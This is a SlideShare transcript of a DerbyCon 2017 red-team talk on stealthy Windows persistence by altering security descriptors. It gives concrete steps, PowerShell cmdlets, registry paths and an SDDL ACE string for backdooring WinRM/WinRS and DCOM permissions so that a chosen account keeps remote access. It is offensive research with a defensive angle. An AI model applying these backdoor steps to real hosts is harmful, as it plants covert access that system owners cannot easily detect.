SlideShare a Scribd company logo

An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

This talk was given at DerbyCon 2017.

1 of 63
Download to read offline
An ACE in the Hole
Stealthy Host Persistence via
Security Descriptors
Who We Are
× @tifkin_ / @enigma0x3 / @harmj0y
× Red teamers/researchers at
SpecterOps
× Code on code on code
× Cons on cons on cons
2
What This Is
× Offensive applications
× Intro to securable objects
× Our Research Process
× Securable object takeover primitives
× Case studies/demos
× Defense
3
1.
Offensive
Applications
WHY this is useful
4
“As an offensive
researcher, if you can
dream it, someone has
likely already done
it...and that someone
isn’t the kind of person
who speaks at security
cons”
5
Matt “f’ing” Graeber
BlackHat 2015
6
Ad

Recommended

The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitPaula Januszkiewicz
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 

More Related Content

What's hot

Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory PwnagePetros Koutroumpis
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have MissedWill Schroeder
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanningamiable_indian
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Petit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirPetit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirLionelTopotam
 
Protecting browsers’ secrets in a domain environment
Protecting browsers’ secrets in a domain environmentProtecting browsers’ secrets in a domain environment
Protecting browsers’ secrets in a domain environmentItai Grady
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATANikhil Mittal
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 

What's hot (20)

Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation  Red Pill2017How fun of privilege escalation  Red Pill2017
How fun of privilege escalation Red Pill2017
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have Missed
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanning
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
Petit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirPetit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossir
 
Protecting browsers’ secrets in a domain environment
Protecting browsers’ secrets in a domain environmentProtecting browsers’ secrets in a domain environment
Protecting browsers’ secrets in a domain environment
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 

Similar to An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with PythonWill Schroeder
 
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16:  XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...XPDS16:  XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...The Linux Foundation
 
Automate threat detections and avoid false positives
  Automate threat detections and avoid false positives  Automate threat detections and avoid false positives
Automate threat detections and avoid false positivesElasticsearch
 
Automatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivosAutomatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivosElasticsearch
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosImma Valls Bernaus
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosImma Valls Bernaus
 
Automatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifsAutomatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifsElasticsearch
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positivesAutomate threat detections and avoid false positives
Automate threat detections and avoid false positivesElasticsearch
 
Automatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivosAutomatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivosElasticsearch
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsWill Schroeder
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Rightenigma0x3
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxGiuseppe Paterno'
 
3.Secure Design Principles And Process
3.Secure Design Principles And Process3.Secure Design Principles And Process
3.Secure Design Principles And Processphanleson
 
Forensic Memory Analysis of Android's Dalvik Virtual Machine
Forensic Memory Analysis of Android's Dalvik Virtual MachineForensic Memory Analysis of Android's Dalvik Virtual Machine
Forensic Memory Analysis of Android's Dalvik Virtual MachineSource Conference
 
Sheng defense
Sheng defenseSheng defense
Sheng defensekalyan_bu
 
dtrace_topics_intro.pdf
dtrace_topics_intro.pdfdtrace_topics_intro.pdf
dtrace_topics_intro.pdfssuser785ce21
 
7 latest-dot-net-interview-questions
7  latest-dot-net-interview-questions7  latest-dot-net-interview-questions
7 latest-dot-net-interview-questionssadiqkhanpathan
 
Permission enforcement s in android new (1)
Permission   enforcement s  in android new (1)Permission   enforcement s  in android new (1)
Permission enforcement s in android new (1)Siddhartha Kakarla
 

Similar to An ACE in the Hole - Stealthy Host Persistence via Security Descriptors (20)

Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with Python
 
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16:  XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...XPDS16:  XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
 
Automate threat detections and avoid false positives
  Automate threat detections and avoid false positives  Automate threat detections and avoid false positives
Automate threat detections and avoid false positives
 
Automatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivosAutomatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivos
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
Automatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifsAutomatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifs
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positivesAutomate threat detections and avoid false positives
Automate threat detections and avoid false positives
 
Automatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivosAutomatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivos
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
 
3.Secure Design Principles And Process
3.Secure Design Principles And Process3.Secure Design Principles And Process
3.Secure Design Principles And Process
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 
Forensic Memory Analysis of Android's Dalvik Virtual Machine
Forensic Memory Analysis of Android's Dalvik Virtual MachineForensic Memory Analysis of Android's Dalvik Virtual Machine
Forensic Memory Analysis of Android's Dalvik Virtual Machine
 
Sheng defense
Sheng defenseSheng defense
Sheng defense
 
dtrace_topics_intro.pdf
dtrace_topics_intro.pdfdtrace_topics_intro.pdf
dtrace_topics_intro.pdf
 
7 latest-dot-net-interview-questions
7  latest-dot-net-interview-questions7  latest-dot-net-interview-questions
7 latest-dot-net-interview-questions
 
Permission enforcement s in android new (1)
Permission   enforcement s  in android new (1)Permission   enforcement s  in android new (1)
Permission enforcement s in android new (1)
 

More from Will Schroeder

Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfWill Schroeder
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedWill Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseWill Schroeder
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conWill Schroeder
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)Will Schroeder
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 

More from Will Schroeder (19)

Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdf
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Certified Pre-Owned
Certified Pre-OwnedCertified Pre-Owned
Certified Pre-Owned
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
A Year in the Empire
A Year in the EmpireA Year in the Empire
A Year in the Empire
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44con
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 
Wielding a cortana
Wielding a cortanaWielding a cortana
Wielding a cortana
 

Recently uploaded

Obstructive jaundice is a medical condition characterized by the yellowing of...
Obstructive jaundice is a medical condition characterized by the yellowing of...Obstructive jaundice is a medical condition characterized by the yellowing of...
Obstructive jaundice is a medical condition characterized by the yellowing of...ssuser7b7f4e
 
Augmented and Mixed Reality Solutions for Frontline Medical Professionals
Augmented and Mixed Reality Solutions for Frontline Medical ProfessionalsAugmented and Mixed Reality Solutions for Frontline Medical Professionals
Augmented and Mixed Reality Solutions for Frontline Medical Professionalsthirdeyegen65
 
Model Jaringan network jaringan komputer.pdf
Model Jaringan network jaringan komputer.pdfModel Jaringan network jaringan komputer.pdf
Model Jaringan network jaringan komputer.pdfgalfinprihardiputra0
 
Regulation is Coming - Trusted Media Summit 2023
Regulation is Coming - Trusted Media Summit 2023Regulation is Coming - Trusted Media Summit 2023
Regulation is Coming - Trusted Media Summit 2023Damar Juniarto
 
Red shadows ringing in Japan's Cyberspace
Red shadows ringing in Japan's CyberspaceRed shadows ringing in Japan's Cyberspace
Red shadows ringing in Japan's Cyberspacesttyk
 
Augmented and Mixed Reality Solutions for Aerospace & Defense
Augmented and Mixed Reality Solutions for Aerospace & DefenseAugmented and Mixed Reality Solutions for Aerospace & Defense
Augmented and Mixed Reality Solutions for Aerospace & Defensethirdeyegen65
 
Biometrics Technology Intresting PPT
Biometrics Technology Intresting PPTBiometrics Technology Intresting PPT
Biometrics Technology Intresting PPTPraveenKumarThota7
 
AWS Overview of AWS Clarify, Feature Store, Hyper parameter Tuning
AWS Overview of AWS  Clarify, Feature Store, Hyper parameter TuningAWS Overview of AWS  Clarify, Feature Store, Hyper parameter Tuning
AWS Overview of AWS Clarify, Feature Store, Hyper parameter TuningVarun Garg
 
UGB INTERNETBANKING FACILITY LAUNCHED.pptx
UGB INTERNETBANKING FACILITY LAUNCHED.pptxUGB INTERNETBANKING FACILITY LAUNCHED.pptx
UGB INTERNETBANKING FACILITY LAUNCHED.pptxRitesh Sahu
 

Recently uploaded (9)

Obstructive jaundice is a medical condition characterized by the yellowing of...
Obstructive jaundice is a medical condition characterized by the yellowing of...Obstructive jaundice is a medical condition characterized by the yellowing of...
Obstructive jaundice is a medical condition characterized by the yellowing of...
 
Augmented and Mixed Reality Solutions for Frontline Medical Professionals
Augmented and Mixed Reality Solutions for Frontline Medical ProfessionalsAugmented and Mixed Reality Solutions for Frontline Medical Professionals
Augmented and Mixed Reality Solutions for Frontline Medical Professionals
 
Model Jaringan network jaringan komputer.pdf
Model Jaringan network jaringan komputer.pdfModel Jaringan network jaringan komputer.pdf
Model Jaringan network jaringan komputer.pdf
 
Regulation is Coming - Trusted Media Summit 2023
Regulation is Coming - Trusted Media Summit 2023Regulation is Coming - Trusted Media Summit 2023
Regulation is Coming - Trusted Media Summit 2023
 
Red shadows ringing in Japan's Cyberspace
Red shadows ringing in Japan's CyberspaceRed shadows ringing in Japan's Cyberspace
Red shadows ringing in Japan's Cyberspace
 
Augmented and Mixed Reality Solutions for Aerospace & Defense
Augmented and Mixed Reality Solutions for Aerospace & DefenseAugmented and Mixed Reality Solutions for Aerospace & Defense
Augmented and Mixed Reality Solutions for Aerospace & Defense
 
Biometrics Technology Intresting PPT
Biometrics Technology Intresting PPTBiometrics Technology Intresting PPT
Biometrics Technology Intresting PPT
 
AWS Overview of AWS Clarify, Feature Store, Hyper parameter Tuning
AWS Overview of AWS  Clarify, Feature Store, Hyper parameter TuningAWS Overview of AWS  Clarify, Feature Store, Hyper parameter Tuning
AWS Overview of AWS Clarify, Feature Store, Hyper parameter Tuning
 
UGB INTERNETBANKING FACILITY LAUNCHED.pptx
UGB INTERNETBANKING FACILITY LAUNCHED.pptxUGB INTERNETBANKING FACILITY LAUNCHED.pptx
UGB INTERNETBANKING FACILITY LAUNCHED.pptx
 

An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

  • 1. An ACE in the Hole Stealthy Host Persistence via Security Descriptors
  • 2. Who We Are × @tifkin_ / @enigma0x3 / @harmj0y × Red teamers/researchers at SpecterOps × Code on code on code × Cons on cons on cons 2
  • 3. What This Is × Offensive applications × Intro to securable objects × Our Research Process × Securable object takeover primitives × Case studies/demos × Defense 3
  • 5. “As an offensive researcher, if you can dream it, someone has likely already done it...and that someone isn’t the kind of person who speaks at security cons” 5 Matt “f’ing” Graeber BlackHat 2015
  • 6. 6
  • 7. 7
  • 8. Why Care (really)? × It’s often difficult to determine whether a specific security descriptor misconfiguration was set maliciously or configured by accident × These changes also have a minimal different forensic footprint and grant: × Bug longevity! Privesc! Persistence! × They might already be on your system ;) × Living off the land++ (existed since NT was born!) 8
  • 9. Big Point(s) × Most defenders are not aware of this general persistence approach, much less how to find and remediate it! × You don’t need to leave malicious code/logic on a system to regain access! × What if this change was made to an organization’s “gold image”? 9
  • 10. Responsibly Evil ;) × Also, you don’t need to set the principal/trustee (who has the rights) to S-1-1-0! × Security descriptor backdoors can be set for specific trustees in a targeted manner so exposure in the environment is minimized 10
  • 11. ¯_(ツ)_/¯ × “if an attacker has code execution on your system, you’re screwed already, so who cares“ × “You need admin rights to do this, this is stupid!“ × To this we say: domain joined boxes != isolated home systems × we guess the defensive industry should just pack up and leave… 11
  • 13. What is a “Securable Object”? A windows object that can have a security descriptor
  • 16. Where are these descriptors? × Found in the registry, the file system, in the kernel, ntds.dit.... × Really depends on the type of object × Finding what objects are securable, much less exactly where their descriptors are located, isn’t as easy as you’d think... 16
  • 17. From DACLs to SACLs 17 × Access Control List (ACL) is basically shorthand for the DACL/SACL superset × An object’s Discretionary Access Control List (DACL) and Security Access Control List (SACL) are ordered collections of Access Control Entries (ACEs) × DACL - What principals/trustees have what rights over the object × The SACL - Specifies how to audit access to the object
  • 19. More on DACLs 19 × Null DACL != no DACL × Inheritance… can be a >_< × General interpretation: × Explicit Deny × Explicit Allow × Inherited Deny × Inherited Allow
  • 21. Our Research Approach Objects accessible from user-mode with a focus on one's usable for persistence/lateral movement 1. Discover securable object 1. Offline and Online Security Descriptors Enumeration 1. Analyze Access mask a. What object-specific rights are there (if any)? b. What rights permit persistence/lateral movement? 1. Operational Weaponization and Detection 21
  • 22. 1. Discovering Securable Objects × Windows documentation lists about 20-30 securable objects* × We’ve identified 70+! (There’s *many* more) × Microsoft Protocol Specifications × Very useful for RPC servers × Find-RegistrySecurityDescriptors.ps1 22*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379557(v=vs.85).aspx
  • 24. 2. Online vs Offline Security Descriptors × Where do objects get their security descriptor? × Offline - Security descriptor derived from registry, file, ntds.dit, etc. × Online - Security descriptor is in memory Our approach to enumeration: × Locally as an unprivileged user × Locally as a privileged user × Remotely as an unprivileged user × Remotely as a privileged user 24
  • 25. Existing Tooling × Use existing tools × Accesschk.exe × WindowsDACLEnumProject × Google’s sandbox analysis tools × NtObjectManager woot woot! × BloodHound × Most do not distinguish between online/offline security descriptors × Implication: How do you know if an object has been modified after creation? 25
  • 26. Enumeration Caveats × “Online” vs offline security descriptors × Necessary token privileges × Some objects are “invisible” to user-mode enumeration × Kernel private namespaces × Does an object with no name have a security descriptor? × https://googleprojectzero.blogspot.co.uk/2014/10/did-man-with-no-name-feel- insecure.html 26
  • 27. 3. Access Mask Analysis Taking back what’s yours ;) 27
  • 28. Deriving Access Mask Meaning × MSDN Documentation × Technical Specifications × Reversing × Trial and error ¯_(ツ)_/¯ 28
  • 29. Generic Object Takeover Primitives × Attacker is owner (implies WRITE_DAC) × Attacker has WRITE_DAC/WRITE_OWNER × Attacks has STANDARD_RIGHTS_ALL × Attacker has GENERIC_ALL* × Object has NULL security descriptor (implies Everyone has GENERIC_ALL) 29 Depends on how the object maps the generic right to standard/object-specific rights. Usually this includes WRITE_DAC/WRITE_OWNER, but doesn’t have to
  • 30. Object-specific Takeover Primitives × Each securable object can define its own rights × Example: Process Rights × PROCESS_CREATE_PROCESS × PROCESS_CREATE_THREAD × PROCESS_SUSPEND_RESUME × PROCESS_QUERY_INFORMATION × PROCESS_TERMINATE × The specific object and its rights determine its offensive usefulness (priv esc, lateral movement, persistence, etc.) 30
  • 32. Service Control Manager RPC Server × “RPC server that enables service configuration and control of service programs.” - MS-SCMR × Applicable Securable Objects × Service Control Manager Server × Windows Services 32
  • 33. SCM Server Applicable Rights 33 SC_MANAGER_CONNECT Permits connecting to service SC_MANAGER_CREATE_SERVICE Ability to add a new service SC_MANAGER_ENUMERATE_SERVICE List out services By default, unauthenticated users can enumerate the security descriptor of the SCM Server!
  • 35. WinRM/WinRS × Windows Remote Management/Windows Remote Shell × Provides the ability to remotely interface with a host × Think PowerShell Remoting × Create backdoored ACE and apply it to either the WinRM or WinRS DACL × Or both!! × Defined user (via SID) will be able to remotely interact with the host without admin privs 35
  • 36. WinRM/WinRS × Security Descriptor can be accessed by pulling the SecurityDescriptorSDDL property of Get- PSSessionConfiguration × Build the new DACL via DiscretionaryAcl.AddAccess() of Security.AccessControl.CommonSecurityDescriptor × PowerShell Remoting: × Set the new DACL via -SecurityDescriptorSddl of Set-PSSessionConfiguration × WinRS × Set WSMan:localhostServiceRootSDDL to the new DACL via Set-Item 36
  • 37. WinRM/WinRS × Already weaponized here: https://github.com/ssOleg/Useful_code/blo b/master/Set-RemoteShellAccess.ps1 × In 2014…. × Takes a domain SID and adds an ACE for that SID to both PowerShell Remoting and WinRS DACLs × Allows that specific user/group to remotely interface with WinRM/WinRS without having any additional privilege 37
  • 38. DCOM × Distributed Component Object Model × Been around since 1996… >_< × Secured via Launch and Activation Permissions × Local/Remote, perms reside in the registry × Can you use interesting DCOM applications to get code-execution? × Applications with “ExecuteShellCommand()” × Backdoor your favorite DCOM application for a specific user/group’s SID :-) 38
  • 39. DCOM × Access is determined via machine-wide permissions first and then application specific permissions × Add target user/group to allow machine-wide Remote Activation/Launch Permissions × Instead of editing the Default, just edit the Limit × HKLM:SoftwaremicrosoftoleMachineLaunchRestriction × A;;CCRPLC;;;$SID × Backdoor a specific DCOM Application for a domain user/group × HKLM:SoftwareClassesAppID{GUID}LaunchPermission × HKLM:SoftwareClassesAppID{GUID}AccessPermission × Requires: SeTakeOwnershipPrivilege, SeRestorePrivilege, SeSecurityPrivilege if installing locally 39
